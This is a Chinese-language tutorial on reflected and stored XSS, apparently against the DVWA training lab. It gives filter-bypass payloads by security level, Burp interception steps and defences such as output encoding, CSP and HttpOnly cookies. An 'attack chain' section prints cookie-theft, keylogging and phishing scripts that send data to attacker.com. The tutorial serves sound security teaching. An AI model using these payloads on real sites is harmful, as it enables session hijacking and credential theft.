XSS跨站脚本攻击

XSS类型概述

三种XSS类型

  • 反射型:最常见,非持久化
  • 存储型:最危险,持久化存储
  • DOM型:基于前端JavaScript,本文不涉及

反射型XSS(Reflected XSS)

标准测试Payload

html 复制代码
<script>alert(1)</script>
<script>alert('XSS')</script>

单引号和双引号都可以使用。

漏洞识别

测试流程

复制代码
1. 输入框输入: zengjun
2. 页面返回: Hello zengjun
3. 查看源代码: <pre>Hello zengjun</pre>
4. 观察输入点位置和闭合方式

判断标准:用户输入直接反映在HTML中。

Low级别攻击

Payload

html 复制代码
zeng<script>alert('XSS')</script>jun

原理

html 复制代码
<!-- 后端代码 -->
<?php
$name = $_GET['name'];
echo "<pre>Hello " . $name . "</pre>";
?>

<!-- 渲染结果 -->
<pre>Hello zeng<script>alert('XSS')</script>jun</pre>

浏览器解析HTML时会执行<script>标签中的JavaScript代码。

Medium级别绕过

防护代码

php 复制代码
$name = str_replace('<script>', '', $_GET['name']);

绕过方法1:双写绕过

html 复制代码
<sc<script>ript>alert(1)</script>

原理

复制代码
输入: <sc<script>ript>alert(1)</script>
过滤: <sc       ript>alert(1)</script>  (中间的<script>被删除)
结果: <script>alert(1)</script>

绕过方法2:大小写绕过

html 复制代码
<sCRipt>alert(1)</script>
<SCRIPT>alert(1)</SCRIPT>

原理 :HTML不区分标签大小写,但str_replace区分。

High级别绕过

防护代码

php 复制代码
$name = preg_replace('/<script\b[^>]*>(.*?)<\/script>/is', "", $_GET['name']);

使用正则表达式过滤所有<script>标签(包括大小写和嵌套)。

绕过方法:利用其他HTML事件

html 复制代码
<img src='x' onerror='alert(1)'/>

原理

  • src='x' - 图片路径不存在,加载失败
  • onerror - 加载失败时触发事件
  • 执行JavaScript代码

其他可用事件

html 复制代码
<img src='x' onmouseover='alert(1)'/>  <!-- 鼠标悬停 -->
<img src='x' onmousedown='alert(1)'/>  <!-- 鼠标按下 -->
<img src='x' onmouseup='alert(1)'/>    <!-- 鼠标松开 -->
<body onload='alert(1)'>               <!-- 页面加载 -->
<input onfocus='alert(1)'>             <!-- 获得焦点 -->

Impossible级别(完美防护)

php 复制代码
<?php
$name = htmlspecialchars($_GET['name']);
?>

htmlspecialchars()函数

复制代码
< 转换为 &lt;
> 转换为 &gt;
" 转换为 &quot;
' 转换为 &#039;
& 转换为 &amp;

效果:所有HTML标签都被转义为实体编码,作为纯文本显示。

html 复制代码
输入: <script>alert(1)</script>
输出: &lt;script&gt;alert(1)&lt;/script&gt;
显示: <script>alert(1)</script> (纯文本,不执行)

存储型XSS(Stored XSS)

危害分析

为什么更危险

  • 持久化存储:保存在数据库中
  • 影响范围广:所有访问者都会中招
  • 隐蔽性强:不需要诱导点击

常见场景

  • 在线留言板
  • 论坛评论
  • 用户资料页
  • 直播弹幕

Low级别攻击

测试步骤

复制代码
Name: xiaoli
Message: <script>alert('Stored XSS')</script>
点击Sign Guestbook

效果:每个访问留言板的用户都会触发弹窗。

后端代码

php 复制代码
<?php
$name = $_POST['txtName'];
$message = $_POST['mtxMessage'];

$query = "INSERT INTO guestbook (name, comment) VALUES ('$name', '$message')";
mysqli_query($conn, $query);
?>

完全没有过滤,直接存入数据库。

Medium级别绕过

防护代码

php 复制代码
$name = strip_tags($_POST['txtName']);  // 移除HTML标签
$message = $_POST['mtxMessage'];        // 留言板不过滤

问题

  • Name字段有字符长度限制(前端)
  • Message字段无过滤

绕过方法:抓包修改

复制代码
1. 输入任意内容并提交
2. Burp Suite抓包
3. 修改Name字段: 
   txtName=<sc<script>ript>alert(1)</script>
4. Forward放行

High级别绕过

防护代码

php 复制代码
$name = preg_replace('/<script\b[^>]*>(.*?)<\/script>/is', '', $_POST['txtName']);
$message = preg_replace('/<script\b[^>]*>(.*?)<\/script>/is', '', $_POST['mtxMessage']);

绕过方法

html 复制代码
<img src='x' onerror='alert(1)'/>

在Name字段通过抓包修改即可。

XSS攻击链

完整攻击流程

javascript 复制代码
// 1. 窃取Cookie
<script>
document.location='http://attacker.com/steal.php?cookie='+document.cookie;
</script>

// 2. 键盘记录
<script>
document.onkeypress = function(e) {
    fetch('http://attacker.com/log.php?key=' + e.key);
}
</script>

// 3. 网络钓鱼
<script>
document.body.innerHTML = '<form action="http://attacker.com/phish.php">...';
</script>

XSS防护完整方案

输入验证

php 复制代码
// 白名单验证
if(!preg_match('/^[a-zA-Z0-9_]+$/', $input)) {
    die("非法字符");
}

输出编码

php 复制代码
// HTML上下文
echo htmlspecialchars($input, ENT_QUOTES, 'UTF-8');

// JavaScript上下文
echo json_encode($input);

// URL上下文
echo urlencode($input);

Content Security Policy

html 复制代码
<meta http-equiv="Content-Security-Policy" 
      content="default-src 'self'; script-src 'self'">

HttpOnly Cookie

php 复制代码
setcookie('session', $value, [
    'httponly' => true,  // 防止JavaScript访问
    'secure' => true,    // 仅HTTPS传输
    'samesite' => 'Strict'
]);
相关推荐
崔庆才丨静觅3 小时前
hCaptcha 验证码图像识别 API 对接教程
前端
passerby60614 小时前
完成前端时间处理的另一块版图
前端·github·web components
掘了4 小时前
「2025 年终总结」在所有失去的人中,我最怀念我自己
前端·后端·年终总结
崔庆才丨静觅4 小时前
实用免费的 Short URL 短链接 API 对接说明
前端
崔庆才丨静觅4 小时前
5分钟快速搭建 AI 平台并用它赚钱!
前端
崔庆才丨静觅5 小时前
比官方便宜一半以上!Midjourney API 申请及使用
前端
Moment5 小时前
富文本编辑器在 AI 时代为什么这么受欢迎
前端·javascript·后端
崔庆才丨静觅5 小时前
刷屏全网的“nano-banana”API接入指南!0.1元/张量产高清创意图,开发者必藏
前端
剪刀石头布啊5 小时前
jwt介绍
前端
爱敲代码的小鱼5 小时前
AJAX(异步交互的技术来实现从服务端中获取数据):
前端·javascript·ajax